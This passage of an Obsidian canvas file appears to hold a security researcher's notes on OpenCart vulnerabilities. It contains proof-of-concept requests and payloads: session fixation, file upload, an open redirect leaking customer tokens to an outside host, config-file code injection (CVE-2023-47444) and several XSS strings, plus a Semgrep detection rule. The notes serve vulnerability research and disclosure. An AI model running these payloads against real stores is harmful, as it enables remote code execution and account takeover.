110 | "path": "dotted",
111 | "pathfindingMethod": "square"
112 | },
113 | "toNode": "7ca354fd21654453",
114 | "toSide": "bottom"
115 | },
116 | {
117 | "color": "5",
118 | "fromNode": "bfd937018307d703",
119 | "fromSide": "bottom",
120 | "id": "8883c809cc29c924",
121 | "styleAttributes": {
122 | "pathfindingMethod": null
123 | },
124 | "toNode": "3ffba2a72c15d234",
125 | "toSide": "top"
126 | },
127 | {
128 | "color": "2",
129 | "fromNode": "bfd937018307d703",
130 | "fromSide": "left",
131 | "id": "24ddf5b28f8220ca",
132 | "styleAttributes": {
133 | },
134 | "toNode": "736c9df76795c8a3",
135 | "toSide": "top"
136 | },
137 | {
138 | "color": "1",
139 | "fromNode": "bfd937018307d703",
140 | "fromSide": "right",
141 | "id": "cbf8daad04264761",
142 | "styleAttributes": {
143 | "pathfindingMethod": "a-star"
144 | },
145 | "toNode": "8e159ebf37163543",
146 | "toSide": "left"
147 | },
148 | {
149 | "color": "2",
150 | "fromNode": "bfd937018307d703",
151 | "fromSide": "right",
152 | "id": "46458ea60041838c",
153 | "styleAttributes": {
154 | "pathfindingMethod": null
155 | },
156 | "toNode": "5130f72c68fcb44c",
157 | "toSide": "left"
158 | },
159 | {
160 | "color": "2",
161 | "fromNode": "bfd937018307d703",
162 | "fromSide": "right",
163 | "id": "118825796013a0f7",
164 | "styleAttributes": {
165 | "pathfindingMethod": null
166 | },
167 | "toNode": "488acef427bc0ca2",
168 | "toSide": "top"
169 | },
170 | {
171 | "color": "2",
172 | "fromNode": "bfd937018307d703",
173 | "fromSide": "right",
174 | "id": "07dfd8cc39321be8",
175 | "styleAttributes": {
176 | "pathfindingMethod": null
177 | },
178 | "toNode": "f0d429c00ed4b383",
179 | "toSide": "left"
180 | },
181 | {
182 | "color": "2",
183 | "fromNode": "bfd937018307d703",
184 | "fromSide": "right",
185 | "id": "9f3c91f016697590",
186 | "styleAttributes": {
187 | "pathfindingMethod": null
188 | },
189 | "toNode": "0cb9ffa450d0f06c",
190 | "toSide": "left"
191 | },
192 | {
193 | "fromNode": "f3ca64c09118de8a",
194 | "fromSide": "right",
195 | "id": "74bb4cc0d5fe09ba",
196 | "styleAttributes": {
197 | "path": "long-dashed",
198 | "pathfindingMethod": "a-star"
199 | },
200 | "toNode": "d8eecf3260e78ee9",
201 | "toSide": "bottom"
202 | },
203 | {
204 | "fromNode": "f3ca64c09118de8a",
205 | "fromSide": "right",
206 | "id": "1a54d0190c9008c0",
207 | "styleAttributes": {
208 | "path": "long-dashed"
209 | },
210 | "toNode": "bd3975130bc38ec9",
211 | "toSide": "left"
212 | },
213 | {
214 | "fromEnd": "arrow",
215 | "fromNode": "0cb9ffa450d0f06c",
216 | "fromSide": "top",
217 | "id": "62d3a9e55b07ae45",
218 | "styleAttributes": {
219 | "path": "dotted"
220 | },
221 | "toNode": "bd3975130bc38ec9",
222 | "toSide": "bottom"
223 | },
224 | {
225 | "fromNode": "bd3975130bc38ec9",
226 | "fromSide": "right",
227 | "id": "001ce232a6716dfe",
228 | "styleAttributes": {
229 | "path": null,
230 | "pathfindingMethod": "square"
231 | },
232 | "toNode": "03db9bac6f37c6aa",
233 | "toSide": "bottom"
234 | }
235 | ],
236 | "metadata": {
237 | },
238 | "nodes": [
239 | {
240 | "height": 4000,
241 | "id": "38d37cd36af30a4f",
242 | "label": "Known vulnerabilities",
243 | "styleAttributes": {
244 | "border": null
245 | },
246 | "type": "group",
247 | "width": 5364,
248 | "x": -1427,
249 | "y": 382
250 | },
251 | {
252 | "height": 2164,
253 | "id": "ce573b456236baa2",
254 | "label": "Setup",
255 | "styleAttributes": {
256 | },
257 | "type": "group",
258 | "width": 1559,
259 | "x": -1849,
260 | "y": -3002
261 | },
262 | {
263 | "color": "5",
264 | "height": 1531,
265 | "id": "3ffba2a72c15d234",
266 | "styleAttributes": {
267 | },
268 | "text": "# Session fixation\n\n*admin_secret/controller/startup/session.php*\n*system/framework.php*\n\n```php title:\"admin_secret/controller/startup/session.php\"\n// Require higher security for session cookies\n$option = [\n\t'expires' => $this->config->get('config_session_expire') ? time() + (int)$this->config->get('config_session_expire') : 0,\n\t'path' => $this->config->get('session_path'),\n\t'secure' => $this->request->server['HTTPS'],\n\t'httponly' => false,\n\t'SameSite' => $this->config->get('config_session_samesite')\n];\n\nsetcookie($this->config->get('session_name'), $session->getId(), $option);\n```\n\nReferences:\n- https://github.com/opencart/opencart/issues/12939\n- https://github.com/opencart/opencart/issues/10280\n- ...\n## PoC\n\nCookies are not reset but instead are reflected in server response\n\n```http title:'Cookie are not reset but instead are reflected in server response'\nGET /opencart-latest/admin/index.php HTTP/1.1\nHost: 127.0.0.1\nCache-Control: max-age=0\nCookie: OCSESSID=12345678901234567890123456\nConnection: close\n\n\nHTTP/1.1 200 OK\nDate: Fri, 21 Jul 2023 16:36:37 GMT\nServer: Apache/2.4.57 (Debian)\nSet-Cookie: OCSESSID=12345678901234567890123456; expires=Sat, 22 Jul 2023 16:36:37 GMT; Max-Age=86400; path=/opencart-latest/admin/; SameSite=Strict\n```\n\nAfter a successful login, the old cookie is not refreshed, but the older one is updated:\n\n```http\nPOST /opencart-latest/admin/index.php?route=common/login.login&login_token=582cc2550d2cbfcf0380ba178c462125 HTTP/1.1\nHost: 127.0.0.1\nCookie: OCSESSID=12345678901234567890123456\n\nusername=admin&password=admin\n\n\nHTTP/1.1 200 OK\nDate: Fri, 21 Jul 2023 16:35:47 GMT\nServer: Apache/2.4.57 (Debian)\nSet-Cookie: OCSESSID=12345678901234567890123456; expires=Sat, 22 Jul 2023 16:35:47 GMT; Max-Age=86400; path=/opencart-latest/admin/; SameSite=Strict\n\n{\"redirect\":\"http:\\/\\/127.0.0.1\\/opencart-latest\\/admin\\/index.php?route=common\\/login\"}\n```\n\n",
269 | "type": "text",
270 | "width": 929,
271 | "x": -219,
272 | "y": 1590
273 | },
274 | {
275 | "height": 358,
276 | "id": "03db9bac6f37c6aa",
277 | "styleAttributes": {
278 | },
279 | "text": "### Semgrep rule for detecting unsafe decoding\n\n```yaml\nrules:\n - id: urldecode-from-source\n severity: ERROR\n languages:\n - php\n message: Test\n patterns:\n - pattern: $data[...] = urldecode($BOJ->request->$METHOD['...']);\n```",
280 | "type": "text",
281 | "width": 542,
282 | "x": 1730,
283 | "y": -1705
284 | },
285 | {
286 | "height": 875,
287 | "id": "dd4734ed9c201bfd",
288 | "styleAttributes": {
289 | "border": "dashed"
290 | },
291 | "text": "# Arbitrary File Upload in catalog/download.upload\n\n>[!info]\n>Final name can't be guessed and files are uploaded inside the `/storage` folder, usually outside the web root\n\n```http\nPOST /opencart-latest/admin/index.php?route=catalog/download.upload&user_token=c5658692bdafeb7f9c3b049532e07ad6 HTTP/1.1\nHost: 127.0.0.1\n\n------WebKitFormBoundaryFkyBYo2SIWb1a3pb\nContent-Disposition: form-data; name=\"file\"; filename=\"foo2.txt\"\nContent-Type: text/plain\n\nfoo\n\n------WebKitFormBoundaryFkyBYo2SIWb1a3pb--\n\n\nHTTP/1.1 200 OK\n{\"filename\":\"foo2.txt.e9d3b468bde9b84aea3e6d7884e24ab7\",\"mask\":\"foo2.txt\",\"success\":\"Your file was successfully uploaded!\"}\n```\n\nLog:\n```\nFile uploaded on `/var/www/html/opencart-latest/system/storage/download`\n\nname: foo2.txt\ntmp_name: /tmp/phpEVfTNf\nfilename: foo2.txt\nfile: foo2.txt.e9d3b468bde9b84aea3e6d7884e24ab7\n```\n\nFile can be downloaded using\n```http\nGET /admin_secret/index.php?route=catalog/download.download&user_token=bfd88496b05c083737fcc83d21a66e84&filename=application-x-addon.png.881efb1332597a33d23dad5008361bcb\nHost: localhost\n\n\nHTTP/1.1 200 OK\nontent-Description: File Transfer\nContent-Disposition: attachment; filename=\"application-x-addon.png.881efb1332597a33d23dad5008361bcb\"\n```\n",
292 | "type": "text",
293 | "width": 921,
294 | "x": 2385,
295 | "y": -2890
296 | },
297 | {
298 | "color": "2",
299 | "height": 1173,
300 | "id": "736c9df76795c8a3",
301 | "styleAttributes": {
302 | },
303 | "text": "# Parameter pollution + Open Redirection + token leak\n\nReferences:\n- https://forum.opencart.com/viewtopic.php?t=105805\n- \n\n*catalog/controller/account/login.php*\n\n```php title:'catalog/controller/account/login.php'\npublic function login(): void {\n...\n\tif (isset($this->session->data['redirect'])) {\n\t\t$data['redirect'] = $this->session->data['redirect'];\n\t\tunset($this->session->data['redirect']);\n\t} elseif (isset($this->request->get['redirect'])) {\n\t\t$data['redirect'] = urldecode($this->request->get['redirect']); // source\n\t} else {\n\t\t$data['redirect'] = '';\n\t}\n\t...\n\t// Create customer token\n\t$this->session->data['customer_token'] = oc_token(26);\n\t$this->model_account_customer->deleteLoginAttempts($this->request->post['email']);\n\t// Added strpos check to pass McAfee PCI compliance test (http://forum.opencart.com/viewtopic.php?f=10&t=12043&p=151494#p151295)\n\tif (isset($this->request->post['redirect']) && (strpos($this->request->post['redirect'], $this->config->get('config_url')) !== false)) {\n\t\t$json['redirect'] = str_replace('&', '&', $this->request->post['redirect']) . '&customer_token=' . $this->session->data['customer_token'];\n\t} else {\n\t\t$json['redirect'] = $this->url->link('account/account', 'language=' . $this->config->get('config_language') . '&customer_token=' . $this->session->data['customer_token'], true);\n\t}\n...\n```\n\n## PoC\n\n## Parameter Pollution\n\nhttp://localhost//index.php?route=account/login&language=en-gbr&redirect=http://0xbro.red/?http://localhost/opencart-latest/index.php?route=account/download\n\n```http\nGET /index.php?route=account/login&language=en-gbr&redirect=http://0xbro.red/?http://localhost/opencart-latest/index.php?route=account/download HTTP/1.1\nHost: localhost\n\n\nHTTP/1.1 200 OK\n \n\n```\n\n## Open Redirection\n\n\n```http\nPOST /opencart-latest/index.php?route=account/login.login&language=en-gb&login_token=51ff83a8903ae28b28d8ab9f7d HTTP/1.1\nHost: localhost\nContent-Length: 168\n\nemail=customer1%40opencart.com&password=customer1&redirect=http%3A%2F%2F0xbro.red%2F%3Fhttp%3A%2F%2Flocalhost%2Fopencart-latest%2Findex.php%3Froute%3Daccount%2Fdownload\n\n\n\nHTTP/1.1 200 OK\n{\"redirect\":\"http:\\/\\/0xbro.red\\/?http:\\/\\/localhost\\/opencart-latest\\/index.php?route=account\\/download&customer_token=6b477d397c440f16f7742f6517\"}\n```",
304 | "type": "text",
305 | "width": 1060,
306 | "x": -1371,
307 | "y": 1811
308 | },
309 | {
310 | "color": "1",
311 | "height": 1605,
312 | "id": "8e159ebf37163543",
313 | "styleAttributes": {
314 | },
315 | "text": "# Static Code Injection in common/security.admin - CVE-2023-47444 (pt. 2)\n\n>[!info]\n>The vulnerability can be exploited only if the admin path is still the default\n\n*admin/controller/common/security.php*\n```php title:'admin/controller/common/security.php'\npublic function admin(): void {\n\tif (isset($this->request->get['page'])) {\n\t\t\t$page = (int)$this->request->get['page'];\n\t\t} else {\n\t\t\t$page = 1;\n\t\t}\n\n\t\tif (isset($this->request->get['name'])) {\n\t\t\t$name = preg_replace('[^a-zA-z0-9]', '', basename(html_entity_decode(trim((string)$this->request->get['name']), ENT_QUOTES, 'UTF-8')));\n\t\t} else {\n\t\t\t$name = 'admin';\n\t\t}\n\t\t$json = [];\n\t\tif ($this->user->hasPermission('modify', 'common/security')) {\n\t\t\t...\n\t\t}\n\t}esle{\n\t\t//error\n\t}\n\tif (!$json) {\n\t\t// 1. // 1. We need to copy the files, as rename cannot be used on any directory, the executing script is running under\n\t\t...\n\t\t// Add the file to the files to be deleted array\n\t\t// 2. Create the new admin folder name\n\t\tif (!is_dir($base_new)) {\n\t\t\tmkdir($base_new, 0777);\n\t\t}\n\t\t// 3. split the file copies into chunks.\n\t\t$total = count($files);\n\t\t$limit = 200;\n\t\t$start = ($page - 1) * $limit;\n\t\t$end = $start > ($total - $limit) ? $total : ($start + $limit);\n\n\t\t// 4. Copy the files across\n\t\t...\n\t\tif (($page * $limit) <= $total) {\n\t\t\t// redirect\n\t\t} else {\n\t\t\t// Update the old config files\n\t\t\t$file = $base_new . 'config.php';\n\t\t\t$output = '';\n\t\t\t$lines = file($file);\n\t\t\tforeach ($lines as $line_id => $line) {\n\t\t\t\t$status = true;\n\n\t\t\t\tif (strpos($line, 'define(\\'HTTP_SERVER') !== false) {\n\t\t\t\t\t$output .= 'define(\\'HTTP_SERVER\\', \\'' . substr(HTTP_SERVER, 0, strrpos(HTTP_SERVER, '/admin/')) . '/' . $name . '/\\');' . \"\\n\"; // RCE!\n\t\t\t\t\t$status = false;\n\t\t\t\t}\n\n\t\t\t\tif (strpos($line, 'define(\\'DIR_APPLICATION') !== false) {\n\t\t\t\t\t$output .= 'define(\\'DIR_APPLICATION\\', DIR_OPENCART . \\'' . $name . '/\\');' . \"\\n\"; // RCE!\n\t\t\t\t\t$status = false;\n\t\t\t\t}\n\n\t\t\t\tif ($status) {\n\t\t\t\t\t$output .= $line;\n\t\t\t\t}\n\t\t\t}\n\t\t\t// write file\n\t\t}\n\t}\n}\n```\n\n# PoC\n\n\n```http\nGET /opencart-latest/admin/index.php?route=common/security.admin&page=10&user_token=3cf1fa8ece0d0edce6354eab30d7d932&name=admin1');phpinfo();%23 HTTP/1.1\n\nHTTP/1.1 200 OK\n{\"redirect\":\"http:\\/\\/127.0.0.1\\/opencart-latest\\/admin1');phpinfo();#\\/index.php?route=common\\/login\"}\n```\n\n```php title:config.php\n...\n// HTTP\ndefine('HTTP_SERVER', 'http://127.0.0.1/opencart-latest/admin1');phpinfo();#/');\n...\ndefine('DIR_APPLICATION', DIR_OPENCART . 'admin1');phpinfo();#/');\n...\n```\n",
316 | "type": "text",
317 | "width": 1706,
318 | "x": 823,
319 | "y": 2547
320 | },
321 | {
322 | "color": "2",
323 | "height": 576,
324 | "id": "0cb9ffa450d0f06c",
325 | "styleAttributes": {
326 | },
327 | "text": "# Multiple XSS\n\n[CVE-2024-21515](https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266573) - Fixed (?)\n\n```\n/admin/index.php?route=tool/log.download&filename=error.log%3Cimg+src%3D1+onerror%3Dalert%281%29%3E\n```\n\n[CVE-2024-21516](https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266576)\n\n```\n/admin/index.php?route=common/filemanager.list&directory=demo%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E%253Cinput%2Btype%253D%2522hidden\n```\n\n[CVE-2024-21517](https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266577)\n\n```\n/index.php?route=account/login&language=en-gb&redirect=%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E%253Cinput%2Btype%253D%2522hidden\n```\n\n",
328 | "type": "text",
329 | "width": 1087,
330 | "x": 2026,
331 | "y": 520
332 | },
333 | {
334 | "color": "2",
335 | "height": 597,
336 | "id": "4006fc6337572b1e",
337 | "styleAttributes": {
338 | "border": null
339 | },
340 | "text": "# CVE-2020-10596 - Stored XSS in common/filemanager.list\n\nReferences:\nhttps://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-571935\nhttps://github.com/opencart/opencart/issues/7810\nhttps://github.com/opencart/opencart/issues/7974\nhttps://www.exploitalert.com/view-details.html?id=35634\n\n```http\nPOST /opencart-latest/opencart/admin_secret/index.php?route=common/filemanager.upload&user_token=dc9212bb7217a3336fa53f75169be7b6 HTTP/1.1\n...\nContent-Disposition: form-data; name=\"file[]\"; filename=\"\\\">